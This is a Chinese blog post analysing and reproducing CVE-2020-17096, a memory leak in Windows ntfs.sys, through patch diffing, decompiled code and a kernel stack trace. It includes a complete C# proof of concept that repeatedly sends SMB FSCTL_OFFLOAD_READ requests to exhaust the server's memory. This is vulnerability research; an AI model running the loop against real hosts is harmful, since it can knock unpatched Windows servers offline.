NTFS CVE-2020-17096 分析复现

最新推荐文章于 2023-04-15 12:29:26 发布
最新推荐文章于 2023-04-15 12:29:26 发布
阅读量530 收藏
点赞数
分类专栏: CVE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CharlesGodX/article/details/112801387
版权

转自先知社区:https://xz.aliyun.com/t/8996

简介

2020年12月微软发布CVE-2020-17096的补丁,zecops团队对此漏洞进行了分析,文章在这里,本文根据其文章进行复现学习。这个洞是NTFS模块,zecops分析出来是内存泄露,但是微软对这类内存泄漏的洞很少收,并且标注的是Remote Code Execution,zecops团队也没有找到远程代码执行的地方,所以真正是否为zecops团队分析的那样还需要进一步研究。

补丁对比

问题出在ntfs.sys中,下面是对比的18362.117118362.1256,出除去一些未识别的符号,可以直接定位到NtfsOffloadRead函数

在这里插入图片描述

从函数名可以猜到是文件卸载读的操作,搜一下文档可以找到[MS-FSCC],其中的2.3.41 FSCTL_OFFLOAD_READ Request就是卸载读的操作,应该和这个函数有关

before patch

在这里插入图片描述

after patch

在这里插入图片描述

新版本红框函数内第一个参数从NULL变为 IrpConetxt 并删除了一些对参数的判断,这个 IrpContext 就是 NtfsOffloadRead 函数的第一个参数 ,第一个函数和调试跟踪有关,应该是开发人员使用的,所以重点应该放在第二个 NtfsExtendedCompleteRequestInternal函数,下面的代码基于补丁前的版本,如果第一个参数为NULL则直接跳过对第一个参数的操作,然后调用IRP完成函数

void __fastcall NtfsExtendedCompleteRequestInternal(__int64 a1, IRP *irp, int a3, __int64 a4, int a5)
{
  _QWORD *v5; // r13
  unsigned __int8 v6; // r12
  IRP *Irp; // rsi
  _IO_STACK_LOCATION *v10; // r15
  __int64 v11; // rax
  void *v12; // rcx
  bool v13; // sf
  void *v14; // rcx
  _QWORD *v15; // r14
  _QWORD *v16; // rax
  void *v17; // rcx
  PFILE_OBJECT v18; // rax
  __int64 v19; // rcx
  __int64 v20; // r8

  v5 = 0i64;
  v6 = a4;
  Irp = irp;
  v10 = 0i64;
  if ( irp )
  {
    v10 = irp->Tail.Overlay.CurrentStackLocation;
    if...
  }
  if ( a1 )
  {
    // ...
  }
LABEL_27:
  if ( Irp )
  {
    v18 = v10->FileObject;
    if ( v18 )
      v5 = v18->FsContext;
    Irp->IoStatus.Status = a3;
    if ( (unsigned __int8)(v10->MajorFunction - 3) <= 1u
      && a3 == 0xC000009A
      && v5
      && (*(_DWORD *)(v5[21] + 4i64) & 4) != 0
      && IoIsOperationSynchronous(Irp) )
    {
      ++NtfsFailedPagingFileOps;
    }
    if ( v10->MajorFunction == 3 && a3 == 0xC000009A && (Irp->Flags & 2) != 0 )
      ++NtfsFailedPagingReads;
    IofCompleteRequest(Irp, 1);
  }
}

在patch之后会传入IrpContext,若其非零则会解析很多字段,做一些释放资源和释放内存的操作,调用一些CancelCleanupDereference的函数,由此猜测patch之前没有很好的处理这些释放的资源,导致了内存泄露

 if ( irpcontext )
  {
    // ...
    if ( v12 )
    {
      // ...
      TxfRestoreIsoSnapshots(v12);
      *(_QWORD *)(irpcontext + 416) = 0i64;
    }
    // ...
    if ( *(_QWORD *)(irpcontext + 408) )
    {
      LOBYTE(irp) = a5 == 0;
      TxfProcessCancelList(irpcontext, irp);
    }
    v14 = *(void **)(irpcontext + 416);
    if ( v14 && !a5 )
    {
      TxfRestoreIsoSnapshots(v14);
      *(_QWORD *)(irpcontext + 416) = 0i64;
    }
    v15 = (_QWORD *)(irpcontext + 432);
    v16 = *(_QWORD **)(irpcontext + 432);
    if ( v16 && v16 != v15 )
      TxfProcessTxfFcbCleanupListInternal(irpcontext, a5 == 0, v6, 0i64);
    if ( a5 )
    {
      if ( !v6 )
      {
        NtfsCleanupIrpContext(irpcontext, 1i64);
        goto LABEL_27;
      }
    }
    else if ( !v6 )
    {
      v17 = *(void **)(irpcontext + 416);
      if ( v17 )
      {
        TxfCleanupIsoSnapshots(v17);
        *(_QWORD *)(irpcontext + 416) = 0i64;
      }
      if ( *(_QWORD *)(irpcontext + 392) )
      {
        LOBYTE(irp) = 1;
        TxfDereferenceTransaction(irpcontext + 392, irp);
      }
      goto LABEL_26;
    }
    if ( *v15 && (_QWORD *)*v15 != v15 )
    {
      LOBYTE(a4) = 1;
      TxfProcessTxfFcbCleanupListInternal(irpcontext, 0i64, 1i64, a4);
    }
    goto LABEL_22;
  }

根据zecops的文章分析,该漏洞导致了非分页池中的内存泄漏,而该内存池驻留在物理内存中。需要循环发送FSCTL_OFFLOAD_READ操作,根据zecops的部分poc代码,首先协商了SMB2协议,然后创建一个文件夹,此处必须是文件夹才能进入到patch函数的路径。

漏洞复现

FSCTL_OFFLOAD_READ操作可以基于SMB2协议实现,所以zecops采用的是微软的C#框架,首先需要设置一个共享文件夹用于SMB2协议操作,具体操作如下图,我在桌面创建了一个测试文件夹,右键属性进入共享,因为需要创建文件夹,所以需要在高级共享里设置权限为可读可写

在这里插入图片描述

设置好之后记住网络路径,然后用测试框架测试即可,有两种方法可以测试,可以用ConnectShare指定共享文件进行连接,也可以直接用Connect函数进行连接,只是用Connect函数需要修改Smb2ClientTransport.cs,指定shareName参数为共享目录名InternalConnectShare(domain, userName, password, "test", timeout, securityPackage, useServerToken);,不然会自动加上"IPC$"的字符导致所引目录错误

// Microsoft.Protocols.TestTools.StackSdk.FileAccessService.dll
// Microsoft.Protocols.TestTools.StackSdk.FileAccessService.Smb2.dll
// Microsoft.Protocols.TestTools.StackSdk.Security.SspiLib.dll
// Microsoft.Protocols.TestTools.StackSdk.dll

using System;
using Microsoft.Protocols.TestTools.StackSdk.FileAccessService.Smb2;
using Microsoft.Protocols.TestTools.StackSdk.Security.SspiLib;
using Microsoft.Protocols.TestTools.StackSdk.FileAccessService;
using Microsoft.Protocols.TestTools.StackSdk;

namespace NTFSTest
{
    class Program
    {
        static void Main(string[] args)
        {
            var ip = "192.168.62.142";
            var domain = "DESKTOP-KOT4SRO";
            var share = "test";
            var remote_path = "Thunder_Test";

            Smb2ClientTransport Client = new Smb2ClientTransport();

            var ipAddress = System.Net.IPAddress.Parse(ip);
            
            // SMB2 initialization
            Client.ConnectShare(
                "DESKTOP-KOT4SRO", 
                ipAddress, 
                domain, 
                "thunder", 
                "", 
                share, 
                SecurityPackageType.Negotiate, 
                true
            );
            
            // Create folder
            Client.Create(
                remote_path,
                FsDirectoryDesiredAccess.GENERIC_READ | FsDirectoryDesiredAccess.GENERIC_WRITE,
                FsImpersonationLevel.Anonymous,
                FsFileAttribute.FILE_ATTRIBUTE_DIRECTORY,
                FsCreateDisposition.FILE_CREATE,
                FsCreateOption.FILE_DIRECTORY_FILE
            );
            
            // Construct FSCTL_OFFLOAD_READ_INPUT package
            FSCTL_OFFLOAD_READ_INPUT offloadReadInput = new FSCTL_OFFLOAD_READ_INPUT();
            offloadReadInput.Size  = 32;
            offloadReadInput.Flags = FSCTL_OFFLOAD_READ_INPUT_FLAGS.NONE;
            offloadReadInput.TokenTimeToLive = 0;
            offloadReadInput.Reserved   = 0;
            offloadReadInput.FileOffset = 0;
            offloadReadInput.CopyLength = 0;
            // ToByes
            byte[] requestInputOffloadRead = TypeMarshal.ToBytes(offloadReadInput);

            while (true)
            {
                // Send FSCTL_OFFLOAD_READ
                Client.SendIoctlPayload(CtlCode_Values.FSCTL_OFFLOAD_READ, requestInputOffloadRead);
                // Recv Data
                Client.ExpectIoctlPayload(out _, out _);
            }
        }
    }
}

测试结果会断在ntfs!NtfsOffloadRead,运行会调用NtfsExtendedCompleteRequestInternal函数导致内存泄露

在这里插入图片描述

回溯栈如下

kd> k
 # Child-SP          RetAddr           Call Site
00 ffff8084`daedf438 fffff804`622db831 Ntfs!NtfsExtendedCompleteRequestInternal
01 ffff8084`daedf440 fffff804`6224ccc7 Ntfs!NtfsOffloadRead+0x79d05
02 ffff8084`daedf570 fffff804`6224c481 Ntfs!NtfsUserFsRequest+0x55f
03 ffff8084`daedf5f0 fffff804`5fe3b7ba Ntfs!NtfsFsdFileSystemControl+0x171
04 ffff8084`daedf710 fffff804`6061e0a9 nt!IopfCallDriver+0x56
05 ffff8084`daedf750 fffff804`5feb0a27 nt!IovCallDriver+0x275
06 ffff8084`daedf790 fffff804`61185609 nt!IofCallDriver+0x1be927
07 ffff8084`daedf7d0 fffff804`611bc190 FLTMGR!FltpLegacyProcessingAfterPreCallbacksCompleted+0x159
08 ffff8084`daedf850 fffff804`5fe3b7ba FLTMGR!FltpFsControl+0x110
09 ffff8084`daedf8b0 fffff804`6061e0a9 nt!IopfCallDriver+0x56
0a ffff8084`daedf8f0 fffff804`5feb0a27 nt!IovCallDriver+0x275
0b ffff8084`daedf930 fffff804`5efebfcc nt!IofCallDriver+0x1be927
0c ffff8084`daedf970 fffff804`5efebcc3 srv2!Smb2ExecuteFSIoctl+0x21c
0d ffff8084`daedf9d0 fffff804`5f01c26e srv2!Smb2ExecuteIoctl+0xb3
0e ffff8084`daedfa20 fffff804`5eff9a9f srv2!Smb2ExecuteIoctlCallback+0xe
0f ffff8084`daedfa50 fffff804`5eff989a srv2!RfspThreadPoolNodeWorkerProcessWorkItems+0x13f
10 ffff8084`daedfad0 fffff804`603d8137 srv2!RfspThreadPoolNodeWorkerRun+0x1ba
11 ffff8084`daedfb30 fffff804`5fdee585 nt!IopThreadStart+0x37
12 ffff8084`daedfb90 fffff804`5fe86128 nt!PspSystemThreadStartup+0x55
13 ffff8084`daedfbe0 00000000`00000000 nt!KiStartSystemThread+0x28

WireShark里会抓到循环发送的FSCTL_OFFLOAD_READ包以及返回包

在这里插入图片描述

下面是测试效果,内存泄露的很慢,建议上2G的内存,不过还是能慢慢泄露的。

在这里插入图片描述

总结

本文主要是测试了一下zecops发的文章内容,复现对比了一下这个漏洞,感觉他们的文章更多是在抛砖引玉,到底是不是这个地方还需要更多的研究,不过在此之前建议先看看SMB的相关内容,这样理解起来会更快一些。

  • zecops分析文章

    https://blog.zecops.com/vulnerabilities/ntfs-remote-code-execution-cve-2020-17096-analysis/

  • 测试框架

    https://github.com/microsoft/WindowsProtocolTestSuites

Thunder_J
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内核重载
坦然
09-12 2898
/*++ BUILD Version: 0004 // Increment this if a change has global effects Copyright (c) Microsoft Corporation. All rights reserved. You may only use this code if you agree to the terms of the Win
一份内核重载代码的学习笔记
0xDQ的博客
04-21 1193
0x00 前言 参考文章:https://blog.csdn.net/whatday/article/details/14160875 https://blog.csdn.net/pjz969/article/details/8615085 首先重载内核不是什么新技术,对于绕过HOOK是一种一刀切的做法,不过对于我这样初探内核的小白还是很有总结意义的。 本篇涉及的知识点:0环和3环通信...
[转](70)内核重载 xp sp3 x86 单核
weixin_41875267的博客
11-25 194
一、项目说明 这次项目是这样设计的,首先 inline hook NtTerminateProcess 函数,使其他进程不能关闭受保护的进程,这里选择记事本。 然后编写一个普通的程序,调用 TerminateProcess 函数关闭记事本,如无意外是关不掉的。 然后编写驱动,重载内核,HOOK KiFastCallEntry 函数,让我们的程序系统调用走新内核,这样就可以关掉记事本了。 二、知识回顾 KiFastCallEntry 我们已经逆向分析...
驱动-内核重载
chengtoreal的博客
03-13 481
内核重载 读取ntkrnlpa.exe的PE文件,并展开加载到内存 获取模块基址 修复重定位 修复新的SSDT表 HOOK KiFastCallEntry函数 代码 // 准备工作 // KeServiceDescriptorTable变量,声明就可以直接使用 // 函数原型 typedef NTSTATUS(NTAPI* FnZwOpenProcess)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PCLIENT_ID); typedef struc
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
CVE-2020-1938.zip
04-15
CVE-2020-1938:Apache Tomcat AJP协议远程代码执行漏洞CVE-2020-1938是Apache Tomcat服务器中的一个严重安全漏洞,该漏洞允许攻击者通过AJP(Apache JServ Protocol)接口来实现远程代码执行,从而对目标系统...
cve-2020-2551_poc.py
03-12
cve-2020-2551_poc.py
内核重载-让所有的SSDT函数全部走自己的路!过任何驱动保护
07-31
内核重载-让所有的SSDT函数全部走自己的路!过任何驱动保护 一份 非常不错的源码。。 内核重载了,让所有的SSDT函数全部走自己的路 。爆发式的驱动源码公开。代表了我国民间驱动技术已逐渐成熟,韩国棒子的NP技术终将被完结! 内核重载:内核重载后指定某个程序使用你重载的内核,可以绕过原有内核上面的所有hook
windows xp内核重载
11-07
内核重载 内核重载源代码
重载内核全程分析笔记(附源码)
08-28
重载内核全程分析笔记(附源码) 还记得七夕的那几天,老V率先把AGP的源码发布出来,然后是EasyDebugger的源码出土,后面陆续有很多大牛把珍藏已久的代码拿出来晒太阳,那段疯狂的日子,让看雪论坛都面临崩溃的边缘。折腾了大半天,终于把代码都下载下来了,可是下载下来做什么呢,自己连看都看不懂 于是,带着激动而又郁闷的心情继续学习内核编程。 由于是初学者,很多时候也有不清楚的地方,若下文中有什么地方理解有误,还请大牛多多指正
passTp内核重载
07-31
还没看,先保存,如果好用的话,我会发博客
OD插件之重载内核.rar
05-31
OD插件之重载内核.rar
10内核重载
weixin_30954607的博客
08-31 499
内核重载需求的产生在内核中有很多HOOK, 例如:KiFastCallEntry, SSDT,IDT,OBJECT HOOK,甚至是内核API的内联HOOK , 有些HOOK很容易找到,并还原, 有些HOOK就很难找到. 在某些时候(例如一个病毒HOOK了int3中断,这样调试器就无法得到断点事件),清除HOOK是一种反反调试的技术. 也是防护与反防护的技术. —总之内核层的对抗非常的激...
内核重载的认识
weixin_41725706的博客
12-03 346
内核重载得认识
x86重载内核[源码在最后]
deadpoolwilson12的博客
04-15 740
[滴水三期中级学习记录]x86内核重载技术,驱动程序编写
Win7 内核重载 1 ——内核版PELoader
zfdyq
12-19 8398
重载重点,其实就是自己实现一个山寨版的Windows PELoader  ,重载其实就是将一个模块自己重新加载一份到别的内存,运行它。 所谓内核重载,则是将内核文件即:ntkrnlpa.exe 自己加载一份到内存,并运行它,这样的好处可以避免一切HOOK,如SSDT ,InLineHook 等等,原理就是HOOK继续 HOOK主原来内核,但是实际上Windows走的是我们自己的内核。
CVE-2020-16875复现
最新发布
09-14
为了复现CVE-2020-16875漏洞,您可以按照以下步骤进行操作: 1. 首先,您需要获取漏洞的POC代码。根据引用提供的信息,您可以从https://srcincite.io/pocs/cve-2020-16875.py.txt下载POC代码。 2. 在获得POC代码后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值